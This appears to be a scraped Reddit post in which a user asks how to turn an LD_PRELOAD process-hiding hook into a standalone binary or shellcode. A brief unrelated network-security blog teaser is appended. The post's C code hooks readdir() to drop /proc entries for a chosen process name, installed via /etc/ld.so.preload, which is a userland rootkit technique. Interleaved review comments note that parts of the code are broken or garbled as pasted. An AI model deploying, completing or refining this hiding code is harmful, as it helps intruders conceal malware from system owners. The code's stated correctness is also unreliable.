Using dirent in a regular binary

I wanted to see if it’s possible to use dirent and readdir to hide a file in memory. I know it can be done using an LKM or shared object. I’m trying to just do it with a regular C binary. That way I could change that to shellcode easily and throw it into memory. I’ve got this code which works as a shared object one can hook with /etc/ld.so.preload:

#include <stdio.h>

#include <dlfcn.h>

#include <dirent.h>

#include <string.h>

#include <unistd.h>

/* Name compared against the comm field read from /proc/<pid>/stat; entries
 * of /proc whose process carries this name are dropped from readdir(). */
static const char *process_to_filter = "test";

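/* Resolve the directory path behind a DIR* handle.
 *
 * Reads the /proc/self/fd/<fd> symlink of the handle's descriptor.
 * On success writes a NUL-terminated path into buf and returns 1.
 * Returns 0 when dirp is NULL, size is 0, the handle has no descriptor,
 * the link cannot be read, or the path does not fit in size - 1 bytes
 * (a completely filled buffer is treated as truncated, because readlink()
 * offers no other way to tell a truncated result from an exact fit). */
static int get_dir_name(DIR *dirp, char *buf, size_t size) {
    if (dirp == NULL || size == 0) {
        return 0;
    }

    int fd = dirfd(dirp);
    if (fd == -1) {
        return 0;
    }

    /* "/proc/self/fd/" plus a decimal int always fits in 64 bytes. */
    char link[64];
    snprintf(link, sizeof link, "/proc/self/fd/%d", fd);

    /* readlink() does not NUL-terminate and may fill the whole buffer, so
     * leave one byte spare; then buf[ret] is always in bounds. */
    ssize_t ret = readlink(link, buf, size - 1);
    if (ret < 0 || (size_t)ret >= size - 1) {
        return 0;
    }
    buf[ret] = '\0';
    return 1;
}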

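/* Look up the command name (comm field) of the process identified by the
 * pid string.
 *
 * pid must be a non-empty string of decimal digits; anything else is
 * rejected. The empty string is rejected explicitly because "/proc//stat"
 * resolves to /proc/stat, which would otherwise be opened and misparsed.
 * The name is taken from the parenthesised second field of the first line
 * of /proc/<pid>/stat and copied into buf, which must have room for at
 * least 256 bytes — the conversion is bounded to 255 characters plus the
 * terminator, matching the 256-byte buffers the callers in this file use.
 * Returns 1 on success; 0 if pid is malformed, the stat file cannot be
 * read, or its first line does not have the "<pid> (<name>" shape. */
static int get_process_name(const char *pid, char *buf) {
    if (pid == NULL || *pid == '\0' ||
        strspn(pid, "0123456789") != strlen(pid)) {
        return 0;
    }

    /* tmp holds the path first, then the first line of the stat file. */
    char tmp[275];
    snprintf(tmp, sizeof tmp, "/proc/%s/stat", pid);

    FILE *f = fopen(tmp, "r");
    if (f == NULL) {
        return 0;
    }
    char *line = fgets(tmp, sizeof tmp, f);
    fclose(f);
    if (line == NULL) {
        return 0;
    }

    /* "%*d" consumes the pid without storing it; "%255[^)]" stops at the
     * closing parenthesis and cannot overrun a 256-byte buf. A failed match
     * leaves buf unset, so the conversion count is checked rather than
     * assumed. */
    if (sscanf(tmp, "%*d (%255[^)]", buf) != 1) {
        return 0;
    }
    return 1;
}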

/* NOTE(review): this macro expands to nothing, so the declaration and the
 * readdir() definition that follow are ordinary top-level code, and the two
 * DECLARE_READDIR(...) lines at the end of the listing are empty
 * declarations. A two-parameter macro with no body suggests a multi-line
 * macro whose continuation lines were lost in the paste — confirm against
 * the original source before reasoning about what this file compiles to. */
#define DECLARE_READDIR(dirent, readdir)

/* The next readdir() in the symbol lookup chain; NULL until the hook below
 * resolves it on first use. */
static struct dirent* (*original_readdir)(DIR*) = NULL;

/* Interposed readdir(): forwards to the next readdir in the lookup chain and
 * drops entries of /proc whose process name equals process_to_filter.
 *
 * The filter runs inside whichever process has this library loaded, so it
 * changes only the /proc listing that process sees; nothing in /proc itself
 * is modified, and entries of every other directory pass through unchanged.
 *
 * NOTE(review): dlsym() takes the symbol name as a const char *, but the
 * second argument below is the function `readdir` itself, not a string, so
 * this call does not type-check as written; together with the empty
 * DECLARE_READDIR macro above this looks like a paste artefact — confirm
 * against the original source.
 *
 * NOTE(review): when dlsym() fails the error is printed but execution falls
 * through to `original_readdir(dirp)` with a NULL function pointer, i.e. a
 * crash rather than a fallback. */
struct dirent* readdir(DIR *dirp) {
    if(original_readdir == NULL) {
        original_readdir = dlsym(RTLD_NEXT, readdir);
        if(original_readdir == NULL) {
            fprintf(stderr, "Error in dlsym: %s\n", dlerror());
        }
    }

    struct dirent* dir;
    while(1) {
        dir = original_readdir(dirp);
        if(dir) {
            char dir_name[256];
            char process_name[256];
            /* Skip the entry only when all four hold: the handle resolves to
             * exactly "/proc", the entry name is a pid whose stat file could
             * be read, and the name read from it matches the filter. */
            if(get_dir_name(dirp, dir_name, sizeof(dir_name)) &&
               strcmp(dir_name, "/proc") == 0 &&
               get_process_name(dir->d_name, process_name) &&
               strcmp(process_name, process_to_filter) == 0) {
                continue;
            }
        }
        /* Either NULL (end of directory or error) or a non-filtered entry. */
        break;
    }
    return dir;
}

/* With DECLARE_READDIR defined as empty above, both lines expand to a bare
 * ';' at file scope and declare nothing. */
DECLARE_READDIR(dirent64, readdir64);

DECLARE_READDIR(dirent, readdir);

I don’t know if this is even possible for hiding ports, pids, or files outside of an LKM or shared object. I’ve modified it to compile as a binary and have no errors or warnings with gcc -Wall -Wextra. I tried adding static too, but it doesn’t seem to hide anything. Does anyone know how to do this? Or if I’m at a dead end?

submitted by /u/glued2thefloor

November 15, 2023

Enhancing Network Security: Best Practices for Effective Protection

In an era of escalating cyber threats, enhancing network security is paramount. This article explores a comprehensive approach to network protection, encompassing network scanning, vulnerability and patch management, user access controls, network segmentation, and employee training. Highlighting best practices and their importance, it provides critical insights for organizations aiming to bolster their defenses and safeguard […]

The post Enhancing Network Security: Best Practices for Effective Protection first appeared on Internet Security Blog – Hackology.

November 15, 2023